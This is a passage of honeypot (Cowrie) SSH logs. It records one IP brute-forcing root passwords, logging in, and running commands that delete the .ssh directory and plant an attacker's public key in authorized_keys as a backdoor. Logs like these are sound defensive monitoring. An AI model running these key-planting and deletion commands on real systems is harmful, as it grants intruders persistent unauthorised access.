-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:28:40.595230Z","src_ip":"212.227.235.229","session":"089c29e082f8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:28:42.226781Z","src_ip":"212.227.235.229","session":"089c29e082f8"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:42.611821Z","src_ip":"212.227.235.229","session":"7df2e4e52618"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:42.616568Z","src_ip":"212.227.235.229","session":"089c29e082f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57031,"dst_ip":"1.2.3.4","dst_port":22,"session":"82f76de9af6b","protocol":"ssh","message":"New connection: 212.227.235.229:57031 (1.2.3.4:22) [session: 82f76de9af6b]","sensor":"my-vps","timestamp":"2025-09-09T06:28:54.862477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:28:54.864710Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:28:55.205351Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.login.success","username":"root","password":"user12","message":"login attempt [root/user12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:28:57.182091Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:28:58.514263Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:28:58.514967Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:28:58.516031Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:28:59.255783Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:28:59.665704Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:28:59.666454Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:29:00.039747Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:00.040992Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58220,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2e14910c4e4","protocol":"ssh","message":"New connection: 212.227.235.229:58220 (1.2.3.4:22) [session: d2e14910c4e4]","sensor":"my-vps","timestamp":"2025-09-09T06:29:00.431782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:00.432520Z","src_ip":"212.227.235.229","session":"d2e14910c4e4"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:00.805346Z","src_ip":"212.227.235.229","session":"d2e14910c4e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60718,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ced6ab4216c","protocol":"ssh","message":"New connection: 212.227.235.229:60718 (1.2.3.4:22) [session: 3ced6ab4216c]","sensor":"my-vps","timestamp":"2025-09-09T06:29:02.254863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:02.260204Z","src_ip":"212.227.235.229","session":"3ced6ab4216c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:02.360368Z","src_ip":"212.227.235.229","session":"d2e14910c4e4"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:02.435951Z","src_ip":"212.227.235.229","session":"3ced6ab4216c"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"monitor123","message":"login attempt [monitor/monitor123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:03.124078Z","src_ip":"212.227.235.229","session":"3ced6ab4216c"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:03.723582Z","src_ip":"212.227.235.229","session":"d2e14910c4e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59223,"dst_ip":"1.2.3.4","dst_port":22,"session":"731ae7bd4c92","protocol":"ssh","message":"New connection: 212.227.235.229:59223 (1.2.3.4:22) [session: 731ae7bd4c92]","sensor":"my-vps","timestamp":"2025-09-09T06:29:04.078429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:04.079305Z","src_ip":"212.227.235.229","session":"731ae7bd4c92"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:04.296057Z","src_ip":"212.227.235.229","session":"3ced6ab4216c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:04.430577Z","src_ip":"212.227.235.229","session":"731ae7bd4c92"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:06.011274Z","src_ip":"212.227.235.229","session":"731ae7bd4c92"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:06.384745Z","src_ip":"212.227.235.229","session":"731ae7bd4c92"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:06.386278Z","src_ip":"212.227.235.229","session":"82f76de9af6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50719,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e085ae07b15","protocol":"ssh","message":"New connection: 212.227.235.229:50719 (1.2.3.4:22) [session: 9e085ae07b15]","sensor":"my-vps","timestamp":"2025-09-09T06:29:07.506451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:29:07.507458Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:29:07.616234Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.login.success","username":"root","password":"@dm1n2025","message":"login attempt [root/@dm1n2025] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.099476Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49694,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b170b86f0a8","protocol":"ssh","message":"New connection: 212.227.235.229:49694 (1.2.3.4:22) [session: 9b170b86f0a8]","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.198851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.199870Z","src_ip":"212.227.235.229","session":"9b170b86f0a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:29:08.343194Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.343964Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.344834Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.450133Z","src_ip":"212.227.235.229","session":"9b170b86f0a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.457340Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:29:08.799180Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.800030Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.947990Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:29:08.948954Z","src_ip":"212.227.235.229","session":"9e085ae07b15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52405,"dst_ip":"1.2.3.4","dst_port":22,"session":"21009fac76ba","protocol":"ssh","message":"New connection: 212.227.235.229:52405 (1.2.3.4:22) [session: 21009fac76ba]","sensor":"my-vps","timestamp":"2025-09-09T06:29:09.057693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:29:09.069974Z","src_ip":"212.227.235.229","session":"21009fac76ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:29:09.179931Z","src_ip":"212.227.235.229","session":"21009fac76ba"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"password123","message":"login attempt [nexus/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:29:09.591587Z","src_ip":"212.227.235.229","session":"9b170b86f0a8"}
